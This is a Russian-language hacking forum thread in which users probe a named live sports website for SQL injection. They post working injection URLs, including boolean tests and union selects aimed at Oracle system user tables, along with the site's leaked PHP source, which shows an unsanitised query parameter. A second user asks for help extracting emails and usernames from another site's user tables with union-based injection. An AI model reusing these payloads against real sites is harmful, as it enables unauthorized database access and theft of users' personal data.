2 sabe: http://www.gotdotnet.ru/Forums/Web/342101.aspx Думаю, что просто сайт глючный и не более, чем раскрытие пути: Code: http://www.sportscn.com/program/vote/vote_result.php?voteid=2 http://www.sportscn.com/program/vote/vote_result.php?voteid=226 т.к. при таких положительных показателях без всяких там кавычек, минусов и % выдает идентичнуюошибку
Pashkela я знаю английский)) я спросил помочь... да сайт странный..... выдавать может что угодно незабывай ctrl+r а вобще скуля есть.. ибо вывод есть на or 1=1
Бугагагага, кхе http://www.sportscn.com/program/vote/vote_result.php?voteid=1062+or+1=1+group+by+1-- я взламал интернет. З.Ы. сорри за офф.
А мне в фф выкидует исходник страницы: PHP: <? require("../lib/oci8_plus.inc"); require("../lib/function.inc"); if($voteid=="") $voteid = 0; ?> <html> <head> <title>»ЄМеµчІй</title> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <link href="http://www.sportscn.com/css/newspcn.css" rel="stylesheet" type="text/css"> </head> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <table width="473" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td width="132" height="38" align="center" valign="top" background="http://image.sportscn.com/2006/news/tab_diaocha.jpg" class="a3" style="padding-top:7px">»Є Ме µч Ій</td> <td width="341" align="right" valign="bottom" background="http://image.sportscn.com/2006/news/corner_diaocha.jpg"><div style="padding-right:14px"><img src="http://image.sportscn.com/2006/news/sportscn.gif" width="145" height="20"></div></td> </tr> <tr> <td colspan="2" background="http://image.sportscn.com/2006/news/bg_diaocha.gif"> <? $db=new OCI_PLUS; $db->open("info"); $strsql = "select votename from comm_vote where voteid=".$voteid; $db->query($strsql); $db->movenext(); ?> <table width="450" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td height="10" align="center"> </td> </tr> <tr> <td height="32" align="center"><strong><?=$db->f("votename")?></strong></td> </tr> </table> <table width="450" border="1" align="center" cellpadding="0" cellspacing="0" bordercolorlight="C1C1C1" bordercolordark="ffffff" bgcolor="C1C1C1"> <? $strsql = "select sum(voteamount) as vote_sum from comm_vote_content where "; $strsql = $strsql."voteid = ".$voteid; $db->query($strsql); $db->movenext(); $vote_sum = $db->f("vote_sum"); $strsql = "select votecontentid,votecontent,voteamount from comm_vote_content "; $strsql = $strsql."where voteid = ".$voteid." order by votecontentid ASC"; $db->query($strsql); $count = 0; while($db->movenext()){ if(($count%2)==0) $color = "F5F5F5"; else $color = "EAEAEA"; if ($vote_sum<>0){ $per = number_format(($db->f("voteamount")/$vote_sum),4); }else{ $per = 0; } $tab_width = 250; ?> <tr bgcolor="<?=$color?>"> <td width="155" height="20" bgcolor="F5F5F5" style="padding-left:5px"><?=$db->f("votecontent")?></td> <td width="289" style="padding-left:5px"><img src="http://image.sportscn.com/2006/news/diaocha_bar.gif" width="<?=number_format($tab_width*$per,0)?>" height="12" align="absmiddle"> <?=($per*100)?>%</td> </tr> <? $count++; } ?> <tr bgcolor="<?if(($count%2)==0) echo "F5F5F5";else echo "EAEAEA";?>"> <td height="20" colspan="2" align="center">ДїЗ°№ІУРЈє<?=($vote_sum)?> ИЛІОјУ</td> </tr> </table> </td> </tr> <tr> <td colspan="2"><img src="http://image.sportscn.com/2006/news/bottom_diaocha.gif" width="473" height="13"></td> </tr> </table> </body> </html> а вот настройки к бд http://www.sportscn.com/program/lib/oci8_plus.inc не не к бд, жз че какой то.
AkyHa_MaTaTa Ты не поверишь, но у всех так ) sabe Нет там скули Исходник http://www.sportscn.com/program/vote/vote_result.php?voteid=11+and+1=1-- http://www.sportscn.com/program/vote/vote_result.php?voteid=11+and+1=2-- Страница http://www.sportscn.com/program/vote/vote_result.php?voteid=10+and+1=1-- http://www.sportscn.com/program/vote/vote_result.php?voteid=10+and+1=2-- Исходник http://www.sportscn.com/program/vote/vote_result.php?voteid=1+and+1=1-- Страница http://www.sportscn.com/program/vote/vote_result.php?voteid=1+and+1=2-- Логики не вижу , скорее идёт какая-то арифметика с аргументами
Code: http://www.sportscn.com/program/vote/vote_result.php?voteid=1062+union+select+to_char(username)+from+sys.dba_users-- Если не работает с первого раза, нажимайте ctrl+r.
Хацкеры интернет поломали ^^ А если серьезно - хз. У меня иногда и страница: "voteid=1062" с ошибкой вылезает.
R1dex да ты один меня понял.. + jokester я же говоил обнвлять нужно все время.. скрипт видемо некоректный и передает данные с задержкой, возможно не с первого раза изза возникновения ошибок..
что за фигня?) -1+union+select+1,2,3,4,5,6,7,version(),9 выводит версию 5 -1+union+select+1,2,3,4,5,6,7,version(),9+from+mysql.user+--+ ругается доступа нет с помощью SIPT узнал таблы) все таблы делятся на с префиксом VGB и просто другие допустим две таблицы VGB_USER и new_data вот из new_data все выводит а при запросе -1+union+select+1,2,3,4,5,6,7,version(),9+from+VGB_USER+--+ ничего нет в чем проблема?) база одна всего.
2kolpeex к таблице от этого сайта нет доступа?) эт как?)) ошибок не выводит просто нет результата... даже при таком запросе =12+and+1=2+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,VGB_USER.EMAIL,poll_user.username),9+from+VGB_USER,poll_user+--+ нет результата
2z00MAN вот к mysql.user нет прав) выводится ошибка SELECT command denied to user бла-бла@'localhost' for table 'user' а када к этим обращаешся нет ни ошибки ни вывода)
j0ker13, посмотри внимательно, может, всё таки не одна бд? А ещё лучше, дабы избежать ненужных гаданий, кинь линк.
